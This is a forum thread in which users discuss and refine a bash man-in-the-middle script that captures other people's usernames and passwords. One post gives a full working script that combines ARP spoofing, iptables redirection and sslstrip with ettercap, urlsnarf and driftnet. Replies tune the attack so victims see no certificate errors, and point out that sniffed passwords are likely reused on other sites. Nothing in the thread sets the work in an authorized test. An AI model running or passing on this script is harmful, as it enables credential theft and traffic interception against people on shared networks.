Re: Script for sniffing traffic.
The link on http://comax.pagesperso-orange.fr/info/#yamas and the link http://comax.pagesperso-orange.fr/info/mitm/ both point to an old version of the script: VERSION="0.6.9\033[31m-BT5\033[m"
If you download from the update link in the script, http://comax.pagesperso-orange.fr/mitm.sh, then you get the latest version: VERSION="0.7.2\033[31m-BT5\033[m"
It's likely user error due to my lack of knowledge, but I couldn't get the 0.6.9 version to run while the 0.7.2 version ran without issue. With version 0.6.9 it was complaining about an error on line #10 that I couldn't find any problems with.
Re: Script for sniffing traffic.
Yeahp, use updated 0.7.2-BT5 version, it's the last one to date ! I update the website only from time to time. But since it seems to be confusing, I'll do it as soon as I can ! I'll edit this post once everything is clarified, thanks for report ;)
Checked just after posting, the "download script" button links to the good version. The pastebin is "old" though. I'll update it as well !
(Were you copying pastebin rather than downloading ?)
EDIT : all right ! Everything should now point to the latest version. Also, please note that as soon as I have finished testing a "version", i upload it to the server. So even if the website doesn't say anything about it, you can try updating through the script or the website. Of course, don't hesitate to post here, PM me, or mail me for anything !
Re: Script for sniffing traffic.
I think I did a save-as on the Download Raw link from the past-bin version. I thought this was the primary source location until I started digging through the script and noticed where it got the file from. Once I figured that out I just ran the wget line at a prompt to get the file.
Re : Re: Script for sniffing traffic.
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.
Re: Re : Re: Script for sniffing traffic.
Quote:
Originally Posted by
ckcrown
ComaX.
This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea from which website they belong.
Any help would be appreciated.
Yeah, I thought about that, but the parsing is already pretty intense, so I didn't wanted to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script :) [*except for that little work-around mentioned earlier :p ]
So about those sites, two things :
1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.
If you have an idea for parsing sites as the same time as the rest, without being too much of a job, I'l all ears !
On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There shortly will have an option to install it, and/or update it.
Re: Re : Re: Script for sniffing traffic.
ComaX,
I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?
Code:
#!/bin/bash
# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2
# ASCII sniff.sh
echo '
.__ _____ _____ .__
______ ____ |__|/ ____\/ ____\ _____| |__
/ ___// \| \ __\\ __\ / ___/ | \
\___ \| | \ || | | | \___ \| Y \
/____ >___| /__||__| |__| /\/____ >___| /
\/ \/ \/ \/ \/
'
echo '1' > /proc/sys/net/ipv4/ip_forward
iptables --flush
sleep 1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP
if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2
echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
else
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2
echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
fi
# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
# DRIFTNET
Re: Re : Re: Script for sniffing traffic.
My vote is for option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to something like this. I could, and will figure it out by searching these forums, of course.
Edit:
Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.
Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.
Re: Script for sniffing traffic.
Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
Here are some of them..
Quote:
Traceback (most recent call last):
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 59, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.6/dist-packages/twisted/python/context.py", line 37, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/lib/python2.6/dist-packages/twisted/internet/selectreactor.py", line 146, in _doReadOrWrite
why = getattr(selectable, method)()
File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 460, in doRead
return self.protocol.dataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/protocols/basic.py", line 259, in dataReceived
return self.rawDataReceived(data)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 537, in rawDataReceived
self.handleResponseEnd()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 500, in handleResponseEnd
self.handleResponse(b)
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 134, in handleResponse
self.shutdown()
File "/usr/local/lib/python2.6/dist-packages/sslstrip/ServerConnection.py", line 154, in shutdown
self.client.finish()
File "/usr/lib/python2.6/dist-packages/twisted/web/http.py", line 900, in finish
"Request.finish called on a request after its connection was lost; "
exceptions.RuntimeError: Request.finish called on a request after its connection was lost; use Request.notifyFinish to keep track of this.
Re: Script for sniffing traffic.
Thanks for the feedback !
Quote:
Originally Posted by
ckcrown
ComaX,
I ran across a script a while back Called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and well I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass.I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?
Hmm, I'll look into that But I won't spend to much time either, for the reasons I evoked earlier.
Quote:
Originally Posted by
ShortBuss
Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.
Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system it taken out of the middle.
Very good point ! I'll try and do that, it shouldn't be much of a problem. For arpspoof, I believe it is a clean shutdown, since in every test I did, I could get back on the internet immediately.
[Edit] Status : DONE
That's just great ! You don't have to click back into the main window for the name, so it's smoother, and that way we're sure we don't send non-stripped ssl. You just earned a place in the credits :P (If you don't want your nick in it, just tell me ;) )
I don't know why I didn't think of that before !
And yes, arpspoof is cleanly shut.
Quote:
Originally Posted by
kafteras
Hey comaX. I have played around with your script and its very nice and clean but sometimes alot of python errors appear. Do you know the reason?
Here are some of them..
Yup, those are sslstrip/python errors, they're not from my script, and I can't do anything about that. Did you update to sslstrip 0.9 ? It's less buggy.
All I can try to do is to shut verbosity of error output... I didn't think about that, I'll do that too !
[Edit] Status : DONE
Yup, now it's all quiet ! I just had to add "2> /dev/null". But errors still happen. Anyway, since they are not fatal, nor disrupt anything... It's all good !
Thanks for the feedback again, I'll try to work on that tonight or tomorrow.
Edit : with all that and some stuff here and there, 0.7.4 is ready ! It will be online tomorrow (22/05/11) !
Re: Script for sniffing traffic.
Awesome script, thanks for putting the time into it.
